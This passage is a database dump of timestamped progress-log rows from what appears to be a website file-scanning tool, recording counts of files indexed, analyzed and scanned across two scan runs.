far'),(12601,1704725053.586192,2,'info','Analyzed 10500 files containing 100.68 MB of data so far'),(12600,1704725053.308461,2,'info','Analyzed 10400 files containing 100.44 MB of data so far'),(12599,1704725052.669159,2,'info','Analyzed 10300 files containing 92.59 MB of data so far'),(12598,1704725052.292000,2,'info','Analyzed 10200 files containing 91.41 MB of data so far'),(12597,1704725051.923788,2,'info','Analyzed 10100 files containing 91.06 MB of data so far'),(12596,1704725051.574020,2,'info','Analyzed 10000 files containing 90.25 MB of data so far'),(12595,1704725051.234886,2,'info','Analyzed 9900 files containing 89.46 MB of data so far'),(12594,1704725050.837702,2,'info','Analyzed 9800 files containing 88.39 MB of data so far'),(12593,1704725050.455451,2,'info','Analyzed 9700 files containing 87.87 MB of data so far'),(12592,1704725050.087959,2,'info','Analyzed 9600 files containing 87.69 MB of data so far'),(12591,1704725049.749631,2,'info','Analyzed 9500 files containing 87.32 MB of data so far'),(12590,1704725049.443968,2,'info','Analyzed 9400 files containing 87.05 MB of data so far'),(12589,1704725049.119534,2,'info','Analyzed 9300 files containing 86.87 MB of data so far'),(12588,1704725048.777277,2,'info','Analyzed 9200 files containing 86.72 MB of data so far'),(12587,1704725048.484453,2,'info','Analyzed 9100 files containing 86.59 MB of data so far'),(12586,1704725048.162359,2,'info','Analyzed 9000 files containing 86.22 MB of data so far'),(12585,1704725047.788148,2,'info','Analyzed 8900 files containing 86.1 MB of data so far'),(12584,1704725047.456932,2,'info','Analyzed 8800 files containing 85.94 MB of data so far'),(12583,1704725047.173025,2,'info','Analyzed 8700 files containing 85.86 MB of data so far'),(12582,1704725046.873600,2,'info','Analyzed 8600 files containing 85.67 MB of data so far'),(12581,1704725046.525732,2,'info','Analyzed 8500 files containing 85.47 MB of data so far'),(12580,1704725046.227211,2,'info','Analyzed 8400 files containing 85.25 MB of data so far'),(12579,1704725043.712289,2,'info','Analyzed 8300 files containing 85.06 MB of data so far'),(12578,1704725043.422288,2,'info','Analyzed 8200 files containing 84.96 MB of data so far'),(12577,1704725043.130722,2,'info','Analyzed 8100 files containing 84.69 MB of data so far'),(12576,1704725042.834637,2,'info','Analyzed 8000 files containing 84.25 MB of data so far'),(12575,1704725042.541416,2,'info','Analyzed 7900 files containing 83.28 MB of data so far'),(12574,1704725042.156073,2,'info','Analyzed 7800 files containing 82.16 MB of data so far'),(12573,1704725041.766992,2,'info','Analyzed 7700 files containing 81.1 MB of data so far'),(12572,1704725041.380483,2,'info','Analyzed 7600 files containing 79.91 MB of data so far'),(12571,1704725040.834732,2,'info','Analyzed 7500 files containing 78.76 MB of data so far'),(12570,1704725040.429090,2,'info','Analyzed 7400 files containing 77.9 MB of data so far'),(12569,1704725039.891057,2,'info','Analyzed 7300 files containing 74.13 MB of data so far'),(12568,1704725039.518565,2,'info','Analyzed 7200 files containing 73.19 MB of data so far'),(12567,1704725039.041523,2,'info','Analyzed 7100 files containing 72.36 MB of data so far'),(12566,1704725038.554616,2,'info','Analyzed 7000 files containing 70.78 MB of data so far'),(12565,1704725038.110971,2,'info','Analyzed 6900 files containing 69.43 MB of data so far'),(12564,1704725037.648333,2,'info','Analyzed 6800 files containing 69.33 MB of data so far'),(12563,1704725037.307355,2,'info','Analyzed 6700 files containing 68.53 MB of data so far'),(12562,1704725036.818591,2,'info','Analyzed 6600 files containing 65.72 MB of data so far'),(12561,1704725036.372792,2,'info','Analyzed 6500 files containing 63.78 MB of data so far'),(12560,1704725035.936708,2,'info','Analyzed 6400 files containing 63.31 MB of data so far'),(12559,1704725035.455388,2,'info','Analyzed 6300 files containing 61.95 MB of data so far'),(12558,1704725034.890969,2,'info','Analyzed 6200 files containing 59.63 MB of data so far'),(12557,1704725034.405894,2,'info','Analyzed 6100 files containing 57.49 MB of data so far'),(12556,1704725033.859497,2,'info','Analyzed 6000 files containing 55.25 MB of data so far'),(12555,1704725033.363893,2,'info','Analyzed 5900 files containing 52.83 MB of data so far'),(12554,1704725032.837731,2,'info','Analyzed 5800 files containing 49.92 MB of data so far'),(12553,1704725032.415883,2,'info','Analyzed 5700 files containing 47.85 MB of data so far'),(12552,1704725031.968071,2,'info','Analyzed 5600 files containing 45.57 MB of data so far'),(12551,1704725031.612209,2,'info','Analyzed 5500 files containing 45.22 MB of data so far'),(12550,1704725031.281356,2,'info','Analyzed 5400 files containing 44.75 MB of data so far'),(12549,1704725030.889275,2,'info','Analyzed 5300 files containing 44.53 MB of data so far'),(12548,1704725030.579981,2,'info','Analyzed 5200 files containing 44.26 MB of data so far'),(12547,1704725030.239846,2,'info','Analyzed 5100 files containing 43.9 MB of data so far'),(12546,1704725029.874960,2,'info','Analyzed 5000 files containing 43.58 MB of data so far'),(12545,1704725029.465955,2,'info','Analyzed 4900 files containing 43.24 MB of data so far'),(12544,1704725029.077584,2,'info','Analyzed 4800 files containing 42.95 MB of data so far'),(12543,1704725028.727882,2,'info','Analyzed 4700 files containing 41.96 MB of data so far'),(12542,1704725028.276379,2,'info','Analyzed 4600 files containing 40.67 MB of data so far'),(12541,1704725027.862489,2,'info','Analyzed 4500 files containing 39.98 MB of data so far'),(12540,1704725027.503954,2,'info','Analyzed 4400 files containing 39.15 MB of data so far'),(12539,1704725027.137199,2,'info','Analyzed 4300 files containing 38.7 MB of data so far'),(12538,1704725026.821554,2,'info','Analyzed 4200 files containing 38.17 MB of data so far'),(12537,1704725026.535453,2,'info','Analyzed 4100 files containing 37.43 MB of data so far'),(12536,1704725026.206690,2,'info','Analyzed 4000 files containing 36.87 MB of data so far'),(12535,1704725025.890026,2,'info','Analyzed 3900 files containing 36.39 MB of data so far'),(12534,1704725025.568288,2,'info','Analyzed 3800 files containing 35.77 MB of data so far'),(12533,1704725025.306546,2,'info','Analyzed 3700 files containing 35.58 MB of data so far'),(12532,1704725024.953553,2,'info','Analyzed 3600 files containing 35.32 MB of data so far'),(12531,1704725024.571864,2,'info','Analyzed 3500 files containing 35.08 MB of data so far'),(12530,1704725024.161082,2,'info','Analyzed 3400 files containing 32.1 MB of data so far'),(12529,1704725023.740282,2,'info','Analyzed 3300 files containing 32.08 MB of data so far'),(12528,1704725023.433079,2,'info','Analyzed 3200 files containing 32.04 MB of data so far'),(12527,1704725023.055885,2,'info','Analyzed 3100 files containing 32.01 MB of data so far'),(12526,1704725022.694346,2,'info','Analyzed 3000 files containing 31.99 MB of data so far'),(12525,1704725022.377131,2,'info','Analyzed 2900 files containing 31.96 MB of data so far'),(12524,1704725022.066853,2,'info','Analyzed 2800 files containing 31.93 MB of data so far'),(12523,1704725021.717136,2,'info','Analyzed 2700 files containing 31.33 MB of data so far'),(12522,1704725021.398151,2,'info','Analyzed 2600 files containing 30.63 MB of data so far'),(12521,1704725021.062346,2,'info','Analyzed 2500 files containing 29.91 MB of data so far'),(12520,1704725020.731513,2,'info','Analyzed 2400 files containing 29.45 MB of data so far'),(12519,1704725020.465278,2,'info','Analyzed 2300 files containing 29.42 MB of data so far'),(12518,1704725020.172040,2,'info','Analyzed 2200 files containing 29.39 MB of data so far'),(12517,1704725019.805779,2,'info','Analyzed 2100 files containing 27.22 MB of data so far'),(12516,1704725019.472038,2,'info','Analyzed 2000 files containing 24.23 MB of data so far'),(12515,1704725019.208643,2,'info','Analyzed 1900 files containing 23.84 MB of data so far'),(12514,1704725018.907730,2,'info','Analyzed 1800 files containing 23.09 MB of data so far'),(12513,1704725018.548262,2,'info','Analyzed 1700 files containing 21.36 MB of data so far'),(12512,1704725018.231093,2,'info','Analyzed 1600 files containing 20.94 MB of data so far'),(12511,1704725017.929979,2,'info','Analyzed 1500 files containing 20.6 MB of data so far'),(12510,1704725017.659668,2,'info','Analyzed 1400 files containing 19.78 MB of data so far'),(12509,1704725017.405248,2,'info','Analyzed 1300 files containing 19.28 MB of data so far'),(12508,1704725017.101496,2,'info','Analyzed 1200 files containing 18.76 MB of data so far'),(12507,1704725016.726675,2,'info','Analyzed 1100 files containing 16.21 MB of data so far'),(12506,1704725016.305087,2,'info','Analyzed 1000 files containing 12.66 MB of data so far'),(12505,1704725015.987691,2,'info','Analyzed 900 files containing 10.96 MB of data so far'),(12504,1704725015.638595,2,'info','Analyzed 800 files containing 9.99 MB of data so far'),(12503,1704725015.300312,2,'info','Analyzed 700 files containing 8.63 MB of data so far'),(12502,1704725014.884644,2,'info','Analyzed 600 files containing 7.75 MB of data so far'),(12501,1704725014.420061,2,'info','Analyzed 500 files containing 3.17 MB of data so far'),(12500,1704725014.131287,2,'info','Analyzed 400 files containing 2.69 MB of data so far'),(12499,1704725013.748482,2,'info','Analyzed 300 files containing 1.59 MB of data so far'),(12498,1704725013.409463,2,'info','Analyzed 200 files containing 1.07 MB of data so far'),(12497,1704725012.885671,2,'info','Analyzed 100 files containing 544.3 KB of data so far'),(12496,1704725012.457457,2,'info','16453 files indexed'),(12495,1704725012.341799,2,'info','16000 files indexed'),(12494,1704725012.265294,2,'info','15500 files indexed'),(12493,1704725012.207112,2,'info','15000 files indexed'),(12492,1704725012.130215,2,'info','14500 files indexed'),(12491,1704725012.076304,2,'info','14000 files indexed'),(12490,1704725010.955718,2,'info','13500 files indexed'),(12489,1704725010.752974,2,'info','13000 files indexed'),(12488,1704725010.464085,2,'info','12500 files indexed'),(12487,1704725010.381981,2,'info','12000 files indexed'),(12486,1704725010.251147,2,'info','11500 files indexed'),(12485,1704725010.131769,2,'info','11000 files indexed'),(12484,1704725010.030864,2,'info','10500 files indexed'),(13331,1704985515.443804,2,'info','Scanned contents of 2605 additional files at 14.16 per second'),(13330,1704985514.309010,2,'info','Scanned contents of 2596 additional files at 14.20 per second'),(13329,1704985512.839624,2,'info','Scanned contents of 2589 additional files at 14.28 per second'),(13328,1704985511.775312,2,'info','Scanned contents of 2562 additional files at 14.21 per second'),(13327,1704985510.767394,2,'info','Scanned contents of 2545 additional files at 14.20 per second'),(13326,1704985509.720444,2,'info','Scanned contents of 2529 additional files at 14.19 per second'),(13325,1704985508.694556,2,'info','Scanned contents of 2515 additional files at 14.19 per second'),(13324,1704985507.666359,2,'info','Scanned contents of 2500 additional files at 14.19 per second'),(13102,1704985301.862795,2,'info','Analyzed 9100 files containing 86.43 MB of data so far'),(13101,1704985301.550833,2,'info','Analyzed 9000 files containing 86.28 MB of data so far'),(13100,1704985301.224353,2,'info','Analyzed 8900 files containing 85.93 MB of data so far'),(13099,1704985300.911239,2,'info','Analyzed 8800 files containing 85.82 MB of data so far'),(13098,1704985300.645048,2,'info','Analyzed 8700 files containing 85.7 MB of data so far'),(13097,1704985300.354552,2,'info','Analyzed 8600 files containing 85.54 MB of data so far'),(13096,1704985300.084980,2,'info','Analyzed 8500 files containing 85.31 MB of data so far'),(13323,1704985506.574103,2,'info','Scanned contents of 2486 additional files at 14.20 per second'),(13322,1704985505.553240,2,'info','Scanned contents of 2472 additional files at 14.20 per second'),(13321,1704985504.512974,2,'info','Scanned contents of 2457 additional files at 14.20 per second'),(13320,1704985503.455268,2,'info','Scanned contents of 2445 additional files at 14.22 per second'),(13319,1704985502.410911,2,'info','Scanned contents of 2433 additional files at 14.24 per second'),(13318,1704985501.294915,2,'info','Scanned contents of 2421 additional files at 14.26 per second'),(13317,1704985500.261935,2,'info','Scanned contents of 2406 additional files at 14.26 per second'),(13316,1704985499.240535,2,'info','Scanned contents of 2389 additional files at 14.24 per second'),(13315,1704985498.221243,2,'info','Scanned contents of 2373 additional files at 14.23 per second'),(13314,1704985495.373007,2,'info','Scanned contents of 2360 additional files at 14.40 per second'),(13313,1704985494.345849,2,'info','Scanned contents of 2341 additional files at 14.38 per second'),(13312,1704985493.334312,2,'info','Scanned contents of 2322 additional files at 14.35 per second'),(13311,1704985492.322908,2,'info','Scanned contents of 2300 additional files at 14.30 per second'),(13310,1704985491.296141,2,'info','Scanned contents of 2283 additional files at 14.29 per second'),(13309,1704985490.228312,2,'info','Scanned contents of 2271 additional files at 14.31 per second'),(13308,1704985487.260628,2,'info','Scanned contents of 2267 additional files at 14.55 per second'),(13307,1704985486.108388,2,'info','Scanned contents of 2259 additional files at 14.61 per second'),(13306,1704985484.706187,2,'info','Scanned contents of 2252 additional files at 14.70 per second'),(13305,1704985482.493013,2,'info','Scanned contents of 2250 additional files at 14.90 per second'),(13304,1704985478.505115,2,'info','Scanned contents of 2245 additional files at 15.27 per second'),(13303,1704985477.492509,2,'info','Scanned contents of 2235 additional files at 15.31 per second'),(13302,1704985476.365352,2,'info','Scanned contents of 2207 additional files at 15.23 per second'),(13301,1704985475.363294,2,'info','Scanned contents of 2167 additional files at 15.06 per second'),(13300,1704985474.361825,2,'info','Scanned contents of 2119 additional files at 14.83 per second'),(13299,1704985473.346352,2,'info','Scanned contents of 2073 additional files at 14.61 per second'),(13298,1704985472.341721,2,'info','Scanned contents of 2031 additional files at 14.42 per second'),(13297,1704985471.325673,2,'info','Scanned contents of 1986 additional files at 14.20 per second'),(13296,1704985470.319970,2,'info','Scanned contents of 1947 additional files at 14.03 per second'),(13295,1704985469.313827,2,'info','Scanned contents of 1911 additional files at 13.87 per second'),(13294,1704985468.296285,2,'info','Scanned contents of 1871 additional files at 13.68 per second'),(13293,1704985467.286344,2,'info','Scanned contents of 1834 additional files at 13.51 per second'),(13292,1704985466.281817,2,'info','Scanned contents of 1795 additional files at 13.32 per second'),(13291,1704985465.260889,2,'info','Scanned contents of 1754 additional files at 13.11 per second'),(13290,1704985464.245566,2,'info','Scanned contents of 1718 additional files at 12.94 per second'),(13289,1704985463.238504,2,'info','Scanned contents of 1682 additional files at 12.77 per second'),(13288,1704985462.213729,2,'info','Scanned contents of 1644 additional files at 12.58 per second'),(13287,1704985461.207458,2,'info','Scanned contents of 1609 additional files at 12.40 per second'),(13286,1704985460.196706,2,'info','Scanned contents of 1572 additional files at 12.21 per second'),(13285,1704985459.192447,2,'info','Scanned contents of 1543 additional files at 12.08 per second'),(13284,1704985458.172898,2,'info','Scanned contents of 1518 additional files at 11.98 per second'),(13283,1704985457.160230,2,'info','Scanned contents of 1490 additional files at 11.86 per second'),(13282,1704985456.144609,2,'info','Scanned contents of 1462 additional files at 11.73 per second'),(13281,1704985455.142328,2,'info','Scanned contents of 1436 additional files at 11.61 per second'),(13280,1704985454.119889,2,'info','Scanned contents of 1409 additional files at 11.49 per second'),(13279,1704985453.106657,2,'info','Scanned contents of 1382 additional files at 11.36 per second'),(13278,1704985452.082378,2,'info','Scanned contents of 1357 additional files at 11.25 per second'),(13277,1704985451.052149,2,'info','Scanned contents of 1331 additional files at 11.13 per second'),(13276,1704985448.038605,2,'info','Scanned contents of 1301 additional files at 11.16 per second'),(13275,1704985447.031948,2,'info','Scanned contents of 1275 additional files at 11.04 per second'),(13274,1704985445.984487,2,'info','Scanned contents of 1249 additional files at 10.91 per second'),(13273,1704985444.976129,2,'info','Scanned contents of 1218 additional files at 10.73 per second'),(13272,1704985443.954612,2,'info','Scanned contents of 1177 additional files at 10.47 per second'),(13271,1704985442.939724,2,'info','Scanned contents of 1138 additional files at 10.21 per second'),(13270,1704985441.917244,2,'info','Scanned contents of 1099 additional files at 9.95 per second'),(13269,1704985440.876140,2,'info','Scanned contents of 1063 additional files at 9.72 per second'),(13268,1704985439.869528,2,'info','Scanned contents of 1024 additional files at 9.45 per second'),(13267,1704985438.851047,2,'info','Scanned contents of 982 additional files at 9.15 per second'),(13266,1704985437.839152,2,'info','Scanned contents of 939 additional files at 8.83 per second'),(13265,1704985436.806108,2,'info','Scanned contents of 933 additional files at 8.86 per second'),(13264,1704985435.801214,2,'info','Scanned contents of 931 additional files at 8.93 per second'),(13263,1704985433.539184,2,'info','Scanned contents of 930 additional files at 9.11 per second'),(13262,1704985432.532129,2,'info','Scanned contents of 926 additional files at 9.17 per second'),(13261,1704985430.869929,2,'info','Scanned contents of 922 additional files at 9.28 per second'),(13260,1704985429.552735,2,'info','Scanned contents of 916 additional files at 9.34 per second'),(13259,1704985428.448019,2,'info','Scanned contents of 911 additional files at 9.40 per second'),(13258,1704985427.410984,2,'info','Scanned contents of 904 additional files at 9.43 per second'),(13257,1704985426.392513,2,'info','Scanned contents of 897 additional files at 9.45 per second'),(13256,1704985425.374017,2,'info','Scanned contents of 895 additional files at 9.53 per second'),(13255,1704985424.330601,2,'info','Scanned contents of 884 additional files at 9.52 per second'),(13254,1704985423.283653,2,'info','Scanned contents of 882 additional files at 9.61 per second'),(13253,1704985421.807013,2,'info','Scanned contents of 880 additional files at 9.74 per second'),(13252,1704985419.410497,2,'info','Scanned contents of 878 additional files at 9.99 per second'),(13251,1704985418.388192,2,'info','Scanned contents of 871 additional files at 10.02 per second'),(13250,1704985417.243071,2,'info','Scanned contents of 852 additional files at 9.94 per second'),(13249,1704985416.213971,2,'info','Scanned contents of 834 additional files at 9.84 per second'),(13248,1704985412.911536,2,'info','Scanned contents of 828 additional files at 10.17 per second'),(13247,1704985406.027946,2,'info','Scanned contents of 825 additional files at 11.07 per second'),(13246,1704985404.939514,2,'info','Scanned contents of 815 additional files at 11.10 per second'),(13245,1704985403.313678,2,'info','Scanned contents of 810 additional files at 11.28 per second'),(13244,1704985400.718302,2,'info','Scanned contents of 807 additional files at 11.66 per second'),(13243,1704985398.326183,2,'info','Scanned contents of 806 additional files at 12.06 per second'),(13242,1704985397.024864,2,'info','Scanned contents of 787 additional files at 12.01 per second'),(13241,1704985396.017415,2,'info','Scanned contents of 767 additional files at 11.89 per second'),(13240,1704985394.973786,2,'info','Scanned contents of 748 additional files at 11.78 per second'),(13239,1704985393.951577,2,'info','Scanned contents of 729 additional files at 11.67 per second'),(13238,1704985392.943753,2,'info','Scanned contents of 710 additional files at 11.55 per second'),(13237,1704985391.933518,2,'info','Scanned contents of 694 additional files at 11.48 per second'),(13236,1704985390.892087,2,'info','Scanned contents of 674 additional files at 11.35 per second'),(13235,1704985389.869818,2,'info','Scanned contents of 653 additional files at 11.19 per second'),(13234,1704985388.868112,2,'info','Scanned contents of 640 additional files at 11.16 per second'),(13233,1704985387.864366,2,'info','Scanned contents of 632 additional files at 11.21 per second'),(13232,1704985386.757179,2,'info','Scanned contents of 619 additional files at 11.20 per second'),(13231,1704985384.833138,2,'info','Scanned contents of 614 additional files at 11.51 per second'),(13230,1704985383.374156,2,'info','Scanned contents of 603 additional files at 11.62 per second'),(13229,1704985382.273106,2,'info','Scanned contents of 593 additional files at 11.68 per second'),(13228,1704985381.174675,2,'info','Scanned contents of 580 additional files at 11.68 per second'),(13227,1704985380.142490,2,'info','Scanned contents of 565 additional files at 11.61 per second'),(13226,1704985379.125788,2,'info','Scanned contents of 548 additional files at 11.51 per second'),(13225,1704985378.098761,2,'info','Scanned contents of 525 additional files at 11.27 per second'),(13224,1704985377.075575,2,'info','Scanned contents of 506 additional files at 11.10 per second'),(13223,1704985376.003555,2,'info','Scanned contents of 495 additional files at 11.12 per second'),(13222,1704985374.754895,2,'info','Scanned contents of 485 additional files at 11.21 per second'),(13221,1704985373.723508,2,'info','Scanned contents of 476 additional files at 11.27 per second'),(13220,1704985372.655349,2,'info','Scanned contents of 468 additional files at 11.37 per second'),(13219,1704985371.515106,2,'info','Scanned contents of 453 additional files at 11.32 per second'),(13218,1704985370.505173,2,'info','Scanned contents of 436 additional files at 11.18 per second'),(13217,1704985369.465508,2,'info','Scanned contents of 423 additional files at 11.14 per second'),(13216,1704985368.425102,2,'info','Scanned contents of 408 additional files at 11.05 per second'),(13215,1704985367.380226,2,'info','Scanned contents of 392 additional files at 10.92 per second'),(13214,1704985366.306099,2,'info','Scanned contents of 387 additional files at 11.12 per second'),(13213,1704985365.275638,2,'info','Scanned contents of 376 additional files at 11.13 per second'),(13212,1704985364.229772,2,'info','Scanned contents of 360 additional files at 11.00 per second'),(13211,1704985363.159239,2,'info','Scanned contents of 346 additional files at 10.93 per second'),(13210,1704985362.132003,2,'info','Scanned contents of 332 additional files at 10.84 per second'),(13209,1704985361.113486,2,'info','Scanned contents of 306 additional files at 10.33 per second'),(13208,1704985360.077838,2,'info','Scanned contents of 278 additional files at 9.73 per second'),(13207,1704985359.051386,2,'info','Scanned contents of 258 additional files at 9.36 per second'),(13206,1704985357.916800,2,'info','Scanned contents of 253 additional files at 9.58 per second'),(13205,1704985356.862632,2,'info','Scanned contents of 243 additional files at 9.58 per second'),(13204,1704985353.714294,2,'info','Scanned contents of 241 additional files at 10.85 per second'),(13203,1704985352.582241,2,'info','Scanned contents of 235 additional files at 11.15 per second'),(13095,1704985299.835173,2,'info','Analyzed 8400 files containing 85.1 MB of data so far'),(13094,1704985299.548536,2,'info','Analyzed 8300 files containing 84.94 MB of data so far'),(13093,1704985299.263961,2,'info','Analyzed 8200 files containing 84.8 MB of data so far'),(13092,1704985298.980745,2,'info','Analyzed 8100 files containing 84.65 MB of data so far'),(13091,1704985298.699397,2,'info','Analyzed 8000 files containing 84.12 MB of data so far'),(13090,1704985298.441015,2,'info','Analyzed 7900 files containing 83.25 MB of data so far'),(12991,1704985272.213584,2,'info','6500 files indexed'),(12992,1704985272.393525,2,'info','7000 files indexed'),(12993,1704985272.496827,2,'info','7500 files indexed'),(12994,1704985272.602489,2,'info','8000 files indexed'),(12995,1704985272.812045,2,'info','8500 files indexed'),(12996,1704985272.963368,2,'info','9000 files indexed'),(12997,1704985273.096337,2,'info','9500 files indexed'),(12998,1704985273.296118,2,'info','10000 files indexed'),(12999,1704985273.425499,2,'info','10500 files indexed'),(13000,1704985273.511484,2,'info','11000 files indexed'),(13001,1704985273.628895,2,'info','11500 files indexed'),(13002,1704985273.757313,2,'info','12000 files indexed'),(13003,1704985273.849390,2,'info','12500 files indexed'),(13004,1704985274.235193,2,'info','13000 files indexed'),(13005,1704985274.379020,2,'info','13500 files indexed'),(13006,1704985275.270798,2,'info','14000 files indexed'),(13007,1704985275.331205,2,'info','14500 files indexed'),(13008,1704985275.427644,2,'info','15000 files indexed'),(13009,1704985275.502537,2,'info','15500 files indexed'),(13010,1704985275.571975,2,'info','16000 files indexed'),(13011,1704985275.673950,2,'info','16429 files indexed'),(13012,1704985275.957684,2,'info','Analyzed 100 files containing 544.3 KB of data so far'),(13013,1704985276.257611,2,'info','Analyzed 200 files containing 1.07 MB of data so far'),(13014,1704985276.531889,2,'info','Analyzed 300 files containing 1.59 MB of data so far'),(13015,1704985276.789418,2,'info','Analyzed 400 files containing 2.68 MB of data so far'),(13016,1704985277.000215,2,'info','Analyzed 500 files containing 3.06 MB of data so far'),(13017,1704985277.381563,2,'info','Analyzed 600 files containing 7.64 MB of data so far'),(13018,1704985277.687352,2,'info','Analyzed 700 files containing 8.78 MB of data so far'),(13019,1704985277.992276,2,'info','Analyzed 800 files containing 10.23 MB of data so far'),(13020,1704985278.261675,2,'info','Analyzed 900 files containing 11.09 MB of data so far'),(13021,1704985278.597158,2,'info','Analyzed 1000 files containing 13.92 MB of data so far'),(13022,1704985278.957905,2,'info','Analyzed 1100 files containing 17.99 MB of data so far'),(13023,1704985279.243958,2,'info','Analyzed 1200 files containing 18.65 MB of data so far'),(13024,1704985279.482689,2,'info','Analyzed 1300 files containing 19.17 MB of data so far'),(13025,1704985279.720409,2,'info','Analyzed 1400 files containing 19.63 MB of data so far'),(13026,1704985279.966981,2,'info','Analyzed 1500 files containing 20.6 MB of data so far'),(13027,1704985280.191251,2,'info','Analyzed 1600 files containing 20.81 MB of data so far'),(13028,1704985280.430628,2,'info','Analyzed 1700 files containing 21.27 MB of data so far'),(13029,1704985280.718975,2,'info','Analyzed 1800 files containing 23.19 MB of data so far'),(13030,1704985281.003705,2,'info','Analyzed 1900 files containing 23.73 MB of data so far'),(13031,1704985281.263717,2,'info','Analyzed 2000 files containing 24.15 MB of data so far'),(13032,1704985281.652848,2,'info','Analyzed 2100 files containing 27.95 MB of data so far'),(13033,1704985281.971303,2,'info','Analyzed 2200 files containing 29.22 MB of data so far'),(13034,1704985282.248130,2,'info','Analyzed 2300 files containing 29.25 MB of data so far'),(13035,1704985282.529503,2,'info','Analyzed 2400 files containing 29.28 MB of data so far'),(13036,1704985282.788228,2,'info','Analyzed 2500 files containing 29.91 MB of data so far'),(13037,1704985283.095292,2,'info','Analyzed 2600 files containing 30.61 MB of data so far'),(13038,1704985283.367906,2,'info','Analyzed 2700 files containing 31.33 MB of data so far'),(13039,1704985283.668405,2,'info','Analyzed 2800 files containing 31.76 MB of data so far'),(13040,1704985283.930526,2,'info','Analyzed 2900 files containing 31.79 MB of data so far'),(13041,1704985284.173037,2,'info','Analyzed 3000 files containing 31.81 MB of data so far'),(13042,1704985284.418581,2,'info','Analyzed 3100 files containing 31.84 MB of data so far'),(13043,1704985284.698909,2,'info','Analyzed 3200 files containing 31.87 MB of data so far'),(13044,1704985284.982472,2,'info','Analyzed 3300 files containing 31.9 MB of data so far'),(13045,1704985285.248072,2,'info','Analyzed 3400 files containing 31.93 MB of data so far'),(13046,1704985285.575761,2,'info','Analyzed 3500 files containing 35.02 MB of data so far'),(13047,1704985285.822063,2,'info','Analyzed 3600 files containing 35.21 MB of data so far'),(13048,1704985286.065379,2,'info','Analyzed 3700 files containing 35.47 MB of data so far'),(13049,1704985286.305874,2,'info','Analyzed 3800 files containing 35.82 MB of data so far'),(13050,1704985286.558537,2,'info','Analyzed 3900 files containing 36.49 MB of data so far'),(13051,1704985286.789588,2,'info','Analyzed 4000 files containing 36.89 MB of data so far'),(13052,1704985287.041501,2,'info','Analyzed 4100 files containing 37.37 MB of data so far'),(13053,1704985287.298593,2,'info','Analyzed 4200 files containing 38.13 MB of data so far'),(13054,1704985287.540359,2,'info','Analyzed 4300 files containing 38.63 MB of data so far'),(13055,1704985287.810416,2,'info','Analyzed 4400 files containing 39.38 MB of data so far'),(13056,1704985288.095912,2,'info','Analyzed 4500 files containing 39.89 MB of data so far'),(13057,1704985288.378073,2,'info','Analyzed 4600 files containing 40.89 MB of data so far'),(13058,1704985288.672802,2,'info','Analyzed 4700 files containing 42.27 MB of data so far'),(13059,1704985288.922430,2,'info','Analyzed 4800 files containing 42.86 MB of data so far'),(13060,1704985289.179754,2,'info','Analyzed 4900 files containing 43.1 MB of data so far'),(13061,1704985289.452670,2,'info','Analyzed 5000 files containing 43.47 MB of data so far'),(13062,1704985289.737087,2,'info','Analyzed 5100 files containing 43.87 MB of data so far'),(13063,1704985289.983686,2,'info','Analyzed 5200 files containing 44.15 MB of data so far'),(13064,1704985290.235539,2,'info','Analyzed 5300 files containing 44.4 MB of data so far'),(13065,1704985290.477079,2,'info','Analyzed 5400 files containing 44.65 MB of data so far'),(13066,1704985290.806337,2,'info','Analyzed 5500 files containing 45.15 MB of data so far'),(13067,1704985291.067670,2,'info','Analyzed 5600 files containing 45.86 MB of data so far'),(13068,1704985291.423351,2,'info','Analyzed 5700 files containing 48.12 MB of data so far'),(13069,1704985291.734618,2,'info','Analyzed 5800 files containing 50.02 MB of data so far'),(13070,1704985292.071290,2,'info','Analyzed 5900 files containing 52.98 MB of data so far'),(13071,1704985292.404580,2,'info','Analyzed 6000 files containing 55.43 MB of data so far'),(13072,1704985292.751246,2,'info','Analyzed 6100 files containing 57.66 MB of data so far'),(13073,1704985293.087751,2,'info','Analyzed 6200 files containing 59.97 MB of data so far'),(13074,1704985293.409446,2,'info','Analyzed 6300 files containing 62.03 MB of data so far'),(13075,1704985293.700394,2,'info','Analyzed 6400 files containing 63.26 MB of data so far'),(13076,1704985293.969906,2,'info','Analyzed 6500 files containing 63.94 MB of data so far'),(13077,1704985294.283637,2,'info','Analyzed 6600 files containing 65.87 MB of data so far'),(13078,1704985294.624456,2,'info','Analyzed 6700 files containing 68.82 MB of data so far'),(13079,1704985294.897779,2,'info','Analyzed 6800 files containing 69.18 MB of data so far'),(13080,1704985295.185236,2,'info','Analyzed 6900 files containing 69.67 MB of data so far'),(13081,1704985295.475470,2,'info','Analyzed 7000 files containing 70.82 MB of data so far'),(13082,1704985295.844399,2,'info','Analyzed 7100 files containing 72.24 MB of data so far'),(13083,1704985296.175383,2,'info','Analyzed 7200 files containing 73.33 MB of data so far'),(13084,1704985296.550174,2,'info','Analyzed 7300 files containing 74.17 MB of data so far'),(13085,1704985296.993006,2,'info','Analyzed 7400 files containing 78.07 MB of data so far'),(13086,1704985297.310200,2,'info','Analyzed 7500 files containing 78.8 MB of data so far'),(13087,1704985297.604360,2,'info','Analyzed 7600 files containing 80 MB of data so far'),(13088,1704985297.866220,2,'info','Analyzed 7700 files containing 81.09 MB of data so far'),(13089,1704985298.159186,2,'info','Analyzed 7800 files containing 82.32 MB of data so far'),(13202,1704985351.570208,2,'info','Scanned contents of 221 additional files at 11.01 per second'),(13201,1704985349.778976,2,'info','Scanned contents of 188 additional files at 10.28 per second'),(13200,1704985348.767784,2,'info','Scanned contents of 171 additional files at 9.90 per second'),(13199,1704985347.697585,2,'info','Scanned contents of 169 additional files at 10.43 per second'),(13198,1704985346.397402,2,'info','Scanned contents of 163 additional files at 10.94 per second'),(13197,1704985345.269435,2,'info','Scanned contents of 159 additional files at 11.54 per second'),(13196,1704985344.186845,2,'info','Scanned contents of 147 additional files at 11.58 per second'),(13195,1704985343.158804,2,'info','Scanned contents of 126 additional files at 10.80 per second'),(13194,1704985342.042490,2,'info','Scanned contents of 118 additional files at 11.19 per second'),(13193,1704985341.039803,2,'info','Scanned contents of 108 additional files at 11.32 per second'),(13192,1704985340.021941,2,'info','Scanned contents of 96 additional files at 11.26 per second'),(13191,1704985338.921547,2,'info','Scanned contents of 86 additional files at 11.58 per second'),(13190,1704985337.904786,2,'info','Scanned contents of 79 additional files at 12.33 per second'),(13189,1704985336.835322,2,'info','Scanned contents of 59 additional files at 11.05 per second'),(13188,1704985335.826776,2,'info','Scanned contents of 46 additional files at 10.62 per second'),(13187,1704985334.775661,2,'info','Scanned contents of 36 additional files at 10.98 per second'),(13186,1704985333.709879,2,'info','Scanned contents of 29 additional files at 13.10 